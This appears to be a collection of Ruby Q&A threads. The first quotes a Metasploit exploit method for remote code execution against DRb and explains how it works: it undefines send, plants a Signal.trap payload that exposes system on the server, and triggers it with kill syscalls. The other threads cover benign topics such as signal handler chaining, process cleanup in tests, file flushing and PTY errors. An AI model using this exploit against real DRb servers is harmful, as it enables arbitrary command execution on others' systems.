Understanding ruby syntax "class << variable" - ruby

I've been looking at an old bug in DRb via its Metasploit module, which uses this method:
def exploit
  serveruri = datastore['URI']
  DRb.start_service
  p = DRbObject.new_with_uri(serveruri)
  class << p
    undef :send
  end
  p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
  # syscall to decide whether it's 64 or 32 bit:
  # it's getpid on 32bit which will succeed, and writev on 64bit
  # which will fail due to missing args
  begin
    pid = p.send(:syscall, 20)
    p.send(:syscall, 37, pid, 23)
  rescue Errno::EBADF
    # 64 bit system
    pid = p.send(:syscall, 39)
    p.send(:syscall, 62, pid, 23)
  end
  p.send(:my_eval, payload.encoded)
end
I'm not a Ruby programmer, but I have a general sense of what's going on apart from a few lines.
Can anyone explain what's happening in lines 5-9 (starting at "class << ...")?

class << p
  undef :send
end
This undefines the send method of the object p (send is used for dynamically invoking methods on a receiver).
It does this in order to exploit DRbObject's method_missing implementation, which routes method calls to remote objects. I'm not too familiar with DRb, but I'm guessing this may have been done in order to get things past DRbServer's check_insecure_method check, but I'll leave that as an exercise to you since it's outside the scope of the question asked here.
Once it achieves whatever it needed to do through method_missing it adds a method my_eval to Object on the server process, which then uses system to execute the payload as a shell command.
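The mechanism can be sketched with a made-up Proxy class (a stand-in for DRbObject, not DRb itself): undefining a method on an object's singleton class makes subsequent calls to it fall through to method_missing.

```ruby
# Proxy is hypothetical; DRbObject's real method_missing forwards over the wire.
class Proxy
  def method_missing(name, *args)
    "forwarded: #{name}(#{args.inspect})"
  end
end

local = Proxy.new
# send is still defined here, so only the *inner* call is forwarded:
before = local.send(:foo, 1)       # => "forwarded: foo([1])"

remote_style = Proxy.new
class << remote_style
  undef :send                      # the same trick the exploit uses
end
# Now the send call itself hits method_missing and gets "forwarded":
after = remote_style.send(:foo, 1) # => "forwarded: send([:foo, 1])"
```

With send undefined, the remote end receives the send call itself, and the real send runs on the server-side object instead of the local proxy.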

class << p
  undef :send
end
This chunk undefines send on the local DRbObject instance. As Michael pointed out, if a DRbObject does not have a method defined, it will route the method call to the remote server using method_missing.
In this case, all succeeding send calls will be routed to the remote server and evaluated there instead of the local instance.
p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
This triggers Signal.trap with signal 23 and a symbol which appears to contain a chunk of code which, if evaluated, will create a method on Object that provides direct access to the shell.
According to the documentation, Signal.trap can be used to run a block or a command upon receiving a specific signal from the operating system. It's not very clear what a command is, so I did some playing around.
>> pid = fork { Signal.trap(23, :"puts 'test'"); puts "sleeping"; sleep 10 }
sleeping
#=> 37162
>> Process.detach(pid)
#=> #<Thread:0x007f9e13a61d60 sleep>
>> Process.kill(23, pid)
test
#=> 1
Looks like a command in symbol form will be converted to a string and then evaled by Signal.trap.
# syscall to decide whether it's 64 or 32 bit:
# it's getpid on 32bit which will succeed, and writev on 64bit
# which will fail due to missing args
begin
  pid = p.send(:syscall, 20)
  p.send(:syscall, 37, pid, 23)
This section triggers Kernel#syscall, which invokes raw Unix kernel functions. The rescue branch handles 64-bit syscall numbers. Let's just look at the 32-bit section here:
p.send(:syscall, 20) should evaluate to sys_getpid()
p.send(:syscall, 37, pid, 23) should evaluate to sys_kill(<pid>, 23). This will trigger the earlier trap set up for signal 23.
In conclusion, the exploit:
1. Undefines send to force messages through method_missing
2. Uses method_missing to trigger Signal.trap(23) with a chunk of Ruby code converted to a one-line string in symbol form
3. Uses Kernel#syscall to get the PID of the currently running process
4. Uses Kernel#syscall to call kill -23 <pid>, which causes the trap set up in step 2 to fire, which in turn evals the provided symbol to create the my_eval method on Object, providing access to system (shell command execution)
5. Calls the newly created my_eval method with the payload
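The trap-then-kill sequence described above can be reproduced locally with a block handler and a portable signal (USR1 here as an arbitrary stand-in for 23, and a block instead of the eval'ed symbol):

```ruby
fired = false
Signal.trap('USR1') { fired = true }  # analogous to the remote trap setup

pid = Process.pid            # what syscall getpid returns
Process.kill('USR1', pid)    # what syscall kill(pid, sig) does
sleep 0.1                    # give the main thread a chance to run the handler
```

After the sleep, `fired` is true: delivering the signal to our own PID ran the handler, just as the exploit's kill syscall triggers the remote trap.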
References:
http://syscalls.kernelgrok.com/
https://ruby-doc.org/core-2.2.0/Signal.html#method-c-trap
https://ruby-doc.org/core-2.2.0/Kernel.html#method-i-syscall

Is it possible to have multiple traps for a signal

I'm trying to understand Ruby's traps for standard signals.
In specific, I'm trying to have multiple signal handlers ("traps") for the same signal. It seems impossible. Here's a super simplified code to demonstrate the problem:
file traps.rb:
should_stop = false

Signal.trap 'INT' do
  # won't be executed :(
  puts 'int --> A'
  should_stop = true
end

Signal.trap 'INT' do
  # will be executed
  puts 'int --> B'
  should_stop = true
end

times = 0
until should_stop
  puts 'waiting to stop'
  sleep 1
  times += 1
  break if times >= 5
end
puts 'done'
Run the code:
ruby traps.rb
Output without pressing CTRL+C:
waiting to stop
waiting to stop
waiting to stop
waiting to stop
waiting to stop
done
Output with pressing CTRL+C after 2 seconds:
waiting to stop
waiting to stop
^Cint --> B
done
It seems that only the last signal trap to be declared is the one which would be executed.
Is this behavior by design?
If not, how can we have multiple handlers executed to the same signal?
The main reason for asking this is that third party libraries might add their trap to a signal.
If we have two different third party libraries that add their trap to the same signal, only one of them would actually be executed. That's where the fun begins :(
It seems that only the last signal trap to be declared is the one which would be executed.
Is this behavior by design?
It is not very explicit in the documentation of Signal::trap, but it is by design:
The command or block specifies code to be run when the signal is raised.
Note the use of the singular, and the absence of any mention of something like "The command or block is added to the list of trap handlers to be run when the signal is raised."
It becomes clearer if you look at the POSIX trap shell builtin after which Signal::trap is modeled:
The action of trap shall override a previous action (either default action or one explicitly set).
The POSIX sigaction function, which is the C equivalent to trap, says more or less the same thing. Note, however, that sigaction also gives you a way of retrieving the function pointer to the old action. In theory, then, you could install a new action that keeps that pointer around and calls the old action as part of itself, chaining the actions in a limited way.
Note, however, that this would require the old and new action cooperate in some way. Also note that this mode of operation is not modeled by POSIX trap.
If not, how can we have multiple handlers executed to the same signal?
From the documentation:
trap returns the previous handler for the given signal.
So, Signal::trap implements the behavior from sigaction that gives you access to the "old" handler. You could save that old handler somewhere and chain the calls by explicitly calling it from your new handler.
Like with sigaction, this requires some form of cooperation between the handlers.
Combining the answer from Jörg W Mittag and the documentation, here's a simplified solution:
# file traps.rb
should_stop = false

Signal.trap('INT') do
  puts 'int --> A'
  should_stop = true
end

$prev_trap = Signal.trap('INT') do
  puts 'int --> B'
  should_stop = true
  $prev_trap&.call
end

times = 0
until should_stop
  puts 'waiting to stop'
  sleep 1
  times += 1
  break if times >= 5
end
puts 'done'
After running ruby traps.rb, and pressing CTRL+C after 3 seconds, the output looks like this:
waiting to stop
waiting to stop
waiting to stop
^Cint --> B
int --> A
done
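One caveat with this pattern: Signal.trap can also return a String such as "DEFAULT" or "IGNORE" rather than a callable, so a more defensive chain checks respond_to?(:call) before invoking the previous handler. A self-contained sketch using USR2 (an arbitrary signal choice) instead of INT:

```ruby
order = []
Signal.trap('USR2') { order << :a }   # the "old" handler

prev = Signal.trap('USR2') do
  order << :b
  prev.call if prev.respond_to?(:call)  # skip "DEFAULT"/"IGNORE" strings
end

Process.kill('USR2', Process.pid)
sleep 0.1
# order is now [:b, :a]: the newest handler first, then the chained older one
```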

How to stop a process from within the tests, when testing a never-ending process?

I am developing a long-running program in Ruby. I am writing some integration tests for this. These tests need to kill or stop the program after starting it; otherwise the tests hang.
For example, with a file bin/runner
#!/usr/bin/env ruby
while true do
  puts "Hello World"
  sleep 10
end
The (integration) test would be:
class RunReflectorTest < TestCase
  test "it prints a welcome message over and over" do
    out, err = capture_subprocess_io do
      system "bin/runner"
    end
    assert_empty err
    assert_includes out, "Hello World"
  end
end
Only, obviously, this will not work; the test starts and never stops, because the system call never ends.
How should I tackle this? Is the problem in system itself, and would Kernel#spawn provide a solution? If so, how? Somehow the following keeps out empty:
class RunReflectorTest < TestCase
  test "it prints a welcome message over and over" do
    out, err = capture_subprocess_io do
      pid = spawn "bin/runner"
      sleep 2
      Process.kill pid
    end
    assert_empty err
    assert_includes out, "Hello World"
  end
end
This direction also seems like it will cause a lot of timing issues (and slow tests). Ideally, a reader would follow the stream of STDOUT, let the test pass as soon as the string is encountered, and then immediately kill the subprocess. I cannot find how to do this with Process.
Test Behavior, Not Language Features
First, what you're doing is a TDD anti-pattern. Tests should focus on behaviors of methods or objects, not on language features like loops. If you must test a loop, construct a test that checks for a useful behavior like "entering an invalid response results in a re-prompt." There's almost no utility in checking that a loop loops forever.
However, you might decide to test a long-running process by checking to see:
If it's still running after t time.
If it's performed at least i iterations.
If a loop exits properly given certain input or upon reaching a boundary condition.
Use Timeouts or Signals to End Testing
Second, if you decide to do it anyway, you can just escape the block with Timeout::timeout. For example:
require 'timeout'
# Terminates block
Timeout::timeout(3) { `sleep 300` }
This is quick and easy. However, note that using timeout doesn't actually signal the process. If you run this a few times, you'll notice that sleep is still running multiple times as a system process.
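The leftover-process behavior can be demonstrated directly (a sketch; `sleep 300` stands in for any long-running command):

```ruby
require 'timeout'

# Spawn a long-running child, then let Timeout interrupt our wait for it.
pid = spawn('sleep 300')
begin
  Timeout.timeout(1) { Process.wait(pid) }
rescue Timeout::Error
end

# kill with signal 0 only probes for existence; it delivers nothing.
still_running = begin
  Process.kill(0, pid)
  true
rescue Errno::ESRCH
  false
end

# Clean up the child.
Process.kill('TERM', pid)
Process.wait(pid)
```

Even though the Timeout::Error fired, `still_running` is true: Timeout only interrupted our Ruby thread, not the child process.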
It's better to signal the process when you want to exit with Process::kill, ensuring that you clean up after yourself. For example:
pid = spawn 'sleep 300'
Process::kill 'TERM', pid
sleep 3
Process::wait pid
Aside from resource issues, this is a better approach when you're spawning something stateful and don't want to pollute the independence of your tests. You should almost always kill long-running (or infinite) processes in your test teardown whenever you can.
Ideally, a reader would follow the stream of STDOUT and let the test pass as soon as the string is encountered and then immediately kill the subprocess. I cannot find how to do this with Process.
You can redirect the stdout of a spawned process to any file descriptor by specifying the out option:
pid = spawn(command, :out=>"/dev/null") # write mode
With the answer from CodeGnome on how to use Timeout::timeout and the answer from andyconhin on how to redirect Process::spawn IO, I came up with two Minitest helpers that can be used as follows:
it "runs a daemon" do
  wait_for(timeout: 2) do
    wait_for_spawned_io(regexp: /Hello World/, command: ["bin/runner"])
  end
end
The helpers are:
require 'timeout'
require 'shellwords' # for Array#shelljoin

def wait_for(timeout: 1, &block)
  Timeout::timeout(timeout) do
    yield block
  end
rescue Timeout::Error
  flunk "Test did not pass within #{timeout} seconds"
end

def wait_for_spawned_io(regexp: //, command: [])
  buffer = ""
  begin
    read_pipe, write_pipe = IO.pipe
    pid = Process.spawn(command.shelljoin, out: write_pipe, err: write_pipe)
    loop do
      buffer << read_pipe.readpartial(1000)
      break if regexp =~ buffer
    end
  ensure
    read_pipe.close
    write_pipe.close
    Process.kill("INT", pid)
  end
  buffer
end
These can be used in a test which allows me to start a subprocess and capture its STDOUT; as soon as the output matches the regular expression, the test passes, otherwise it waits until the timeout and flunks (fails the test).
The loop captures output and passes the test once it sees matching output. It uses an IO.pipe because that is most transparent for subprocesses (and their children) to write to.
I doubt this will work on Windows. And wait_for_spawned_io needs some cleaning up, since it is doing slightly too much IMO. Another problem is that the Process.kill('INT') might not reach children which are orphaned but still running after this test has run. I need to find a way to ensure the entire subtree of processes is killed.
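One possible approach to killing the subtree, sketched under the assumption of a POSIX platform: spawn the child in its own process group with `pgroup: true`, then signal the negative pid, which delivers the signal to every process in that group (and therefore to the child's descendants):

```ruby
pid = Process.spawn('sleep 300', pgroup: true)  # child leads a fresh group
sleep 0.2                                       # let the group be set up
Process.kill('TERM', -pid)                      # negative pid targets the group
Process.wait(pid)
status = $?
```

Because the child was terminated by the signal, `status.termsig` reports 15 (SIGTERM). This won't help on Windows, where process groups work differently.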

When does ruby release its File.write assignments?

I am writing to a file instance. While the program is still running, the file is always empty. When I check the file after the script has executed, the file has content.
class A
  def initialize
    @file_ref = File.new("/user/shared/ruby/ruby-example/test.html", "w+")
  end

  def fill
    @file_ref.write("whatever\nwhatever\nwhatever\n")
  end
end
The Main script:
require_relative 'A'
a = A.new
a.fill
puts File.size("/user/shared/ruby/ruby-example/test.html")
After the A instance has done its job, the puts statement prints "0", as if the file were empty. Indeed it is empty during program execution, but if I start irb:
puts File.size("/user/shared/ruby/ruby-example/test.html")
# => 27
$ cat test.html
whatever
whatever
whatever
Is my code wrong?
Is it normal that streams are flushed only after the execution of a process?
Ruby flushes IO buffers when you call IO#close or IO#flush. Since you are calling neither close nor flush, the buffers are flushed only when the program terminates and the open file descriptors are released.
Given your simple example a possible solution is:
class A
  def initialize
    @file_ref_name = '/user/shared/ruby/ruby-example/test.html'
  end

  def fill
    File.open(@file_ref_name, 'w+') do |file|
      file.write("whatever\nwhatever\nwhatever\n")
    end
  end
end
Passing a block to IO#open causes the opened file (the file variable in this example) to be closed (and therefore flushed) once the execution of the block terminates.
Please note that Ruby (since version 1.9, to my knowledge) also features a one-liner shortcut for simple file writes, flush included:
File.write('/path/to/file.txt', 'content')
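The buffering described above is easy to observe; a small sketch using a temporary directory (so the original /user/shared path isn't assumed):

```ruby
require 'tmpdir'

path = File.join(Dir.mktmpdir, 'test.html')
f = File.new(path, 'w+')
f.write("whatever\nwhatever\nwhatever\n")
size_before = File.size(path)  # typically 0: the data sits in Ruby's buffer
f.flush
size_after = File.size(path)   # 27: the buffer has been pushed to the OS
f.close
puts size_before, size_after
```

Until the flush, the 27 bytes live in Ruby's userspace buffer, so other readers (including File.size) see an empty file.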

Ruby on Linux PTY goes away without EOF, raises Errno::EIO

I'm writing some code which takes a file, passes that file to one of several binaries for processing, and monitors the conversion process for errors. I've written and tested the following routine on OS X, but it fails on Linux for reasons that aren't clear to me.
# run the command, capture the output so it doesn't display
PTY.spawn(command) { |r, w, pid|
  until r.eof? do
    ##mark
    puts r.readline
  end
}
The command that runs varies quite a lot and the code at the ##mark has been simplified into a local echo in an attempt to debug the problem. The command executes and the script prints the expected output in the terminal and then throws an exception.
The error it produces on Debian systems is: Errno::EIO (Input/output error - /dev/pts/0):
All of the command strings I can come up with produce that error, and when I run the code without the local echo block it runs just fine:
PTY.spawn(command) {|r,w,pid|}
In either case the command itself executes fine, but it seems like debian linux isn't sending eof up the pty. The doc pages for PTY, and IO on ruby-doc don't seem to lend any aid here.
Any suggestions? Thanks.
-vox-
So I had to go as far as reading the C source for the PTY library to get really satisfied with what is going on here.
The Ruby PTY doc doesn't really say what the comments in the source code say.
My solution was to put together a wrapper method and to call that from my script where needed. I've also moved into the method the wait for the process to exit (so it is sure to have finished) and the retrieval of the exit status from $?:
# file: lib/safe_pty.rb
require 'pty'

module SafePty
  def self.spawn(command, &block)
    PTY.spawn(command) do |r, w, p|
      begin
        yield r, w, p
      rescue Errno::EIO
        # the child process has finished and closed its side of the pty
      ensure
        Process.wait p
      end
    end
    $?.exitstatus
  end
end
This is used basically the same as PTY.spawn:
require 'safe_pty'

exit_status = SafePty.spawn(command) do |r, w, pid|
  until r.eof? do
    logger.debug r.readline
  end
end

# test exit_status for zeroness
I was more than a little frustrated to find out that this is a valid response, as it was completely undocumented on ruby-doc.
It seems valid for Errno::EIO to be raised here (it simply means the child process has finished and closed the stream), so you should expect that and catch it.
For example, see the selected answer in Continuously read from STDOUT of external process in Ruby and http://www.shanison.com/2010/09/11/ptychildexited-exception-and-ptys-exit-status/
BTW, I did some testing. On Ruby 1.8.7 on Ubuntu 10.04, I don't get a error. With Ruby 1.9.3, I do. With JRuby 1.6.4 on Ubuntu in both 1.8 and 1.9 modes, I don't get an error. On OS X, with 1.8.7, 1.9.2 and 1.9.3, I don't get an error. The behavior is obviously dependent on your Ruby version and platform.
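To make the read-until-EIO pattern concrete, here is a minimal, self-contained version (Linux-oriented; on FreeBSD the read would return nil at the end instead of raising):

```ruby
require 'pty'

output = +''
PTY.spawn('echo hello') do |r, w, pid|
  begin
    while (line = r.gets)
      output << line
    end
  rescue Errno::EIO
    # On GNU/Linux this simply means the child closed its side of the pty.
  end
  Process.wait(pid)
end
```

After the block, `output` contains the child's "hello" line, and the EIO that followed the last read was swallowed as the de-facto EOF marker.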
As answered here and here, EIO can be avoided by keeping a file descriptor to the pty slave device open in the parent process.
Since PTY.spawn closes the slave file descriptor passed to the child process, a simple workaround is to open a new one. For example:
PTY.spawn("ls") do |r, w, pid|
  r2 = File.open(r.path)
  while IO.select([r], [], [], 1)
    puts r.gets
  end
  r2.close
end
ruby-doc.org has said this since Ruby 1.9:
# The result of read operation when pty slave is closed is platform
# dependent.
ret = begin
        m.gets # FreeBSD returns nil.
      rescue Errno::EIO # GNU/Linux raises EIO.
        nil
      end
Ok, so now I get that this behavior is "normal" on Linux, but it makes it a little tricky to get the output of a PTY. If you do m.read, it reads everything, throws it away, and raises Errno::EIO. You really need to read the content chunk by chunk with m.readline. And even then you risk losing the last line if it doesn't end with "\n" for whatever reason. To be extra safe you need to read the content byte by byte with m.read(1).
Additional note about the effect of a tty/pty on buffering: it's not the same as STDOUT.sync = true (unbuffered output) in the child process; rather, it triggers line buffering, where output is flushed on "\n".

Timeout issue making system call in Ruby on Windows XP

The following code
require 'timeout'
begin
  timeout(20) do # Line 4
    result = `hostname`
  end # Line 6
rescue Timeout::Error
  puts "Timeout"
  exit
end
puts "Result:" + result # Line 12
throws the error
issue.rb:12:in `<main>': undefined local variable or method `result' for main:Object (NameError)
but if I comment out the timeout wrapper (lines 4 and 6), it works fine. I have tried using IO.popen, IO.select, etc., but none of this helps. I've used this timeout technique in many other places and it worked fine.
It doesn't appear to be related to the timeout value, as I have experimented with much larger and smaller values.
I am using Ruby 1.9.2 on Windows XP. Any help much appreciated.
P.S. My original problem was not running "hostname" but a more complex SQL Server batch job. As a bonus question: would a long-running system task that exceeded the timeout be killed automatically? I have read lots of posts about the timeout library not honouring timeouts while busy with system tasks.
The result variable is being defined inside the timeout block, so it's not visible in the outer scope. You should initialize it before:
result = nil
begin
  timeout(20) do # Line 4
    result = `hostname`
  end # Line 6
rescue Timeout::Error
  ...
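The scoping rule behind this can be seen in isolation: a variable first assigned inside a block stays local to that block, while a variable that already exists outside is reused.

```ruby
[1].each { inner = 99 }   # 'inner' is born inside the block...
defined?(inner)           # => nil: ...and is not visible out here

outer = nil               # pre-declared before the block
[1].each { outer = 99 }   # so the block assigns the existing variable
outer                     # => 99
```

This is why initializing result before the timeout block makes it visible on the line that prints it.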
